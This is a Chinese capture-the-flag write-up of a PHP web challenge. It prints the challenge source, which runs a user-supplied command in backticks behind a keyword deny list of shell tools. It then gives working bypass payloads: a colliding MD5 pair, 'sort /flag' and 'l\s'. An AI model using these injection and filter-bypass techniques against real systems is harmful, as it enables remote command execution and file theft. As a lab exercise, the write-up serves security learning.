1.解密的敏感度(或者说工具的强度)
2.md5强比较的累积
3.读取文件的函数累积
进入页面直接burp抓包:
有一个img=TXpVek5UTTFNbVUzTURabE5qYz0,我们直接放到脚本里跑一下:
脚本很好写的,就贴合自己喜欢的方式写一个就行。解码出来发现是555.png.因为这里url的特性,所以这里应该只是进行了三次编码:
hex->base64->base64
那我们试着读取一下页面源码:
然后贴到img里面
解码一下
- error_reporting(E_ALL || ~ E_NOTICE);
- header('content-type:text/html;charset=utf-8');
- $cmd = $_GET['cmd'];
- if (!isset($_GET['img']) || !isset($_GET['cmd']))
- header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
- $file = hex2bin(base64_decode(base64_decode($_GET['img'])));
-
- $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
- if (preg_match("/flag/i", $file)) {
- echo '';
- die("xixiï½ no flag");
- } else {
- $txt = base64_encode(file_get_contents($file));
- echo "";
- echo "
"; - }
- echo $cmd;
- echo "
"; - if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
- echo("forbid ~");
- echo "
"; - } else {
- if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
- echo `$cmd`;
- } else {
- echo ("md5 is funny ~");
- }
- }
-
- ?>
- body{
- background:url(./bj.png) no-repeat center center;
- background-size:cover;
- background-attachment:fixed;
- background-color:#CCCCCC;
- }
关于cmd过滤了很多,并且进入的条件还有一个
(string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])
简单,把家底炒出来:
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
sort /flag
这个姿势不足的就是不知道flag名字,得猜
l\s
这个方法绕过很好用,也可以知道flag名字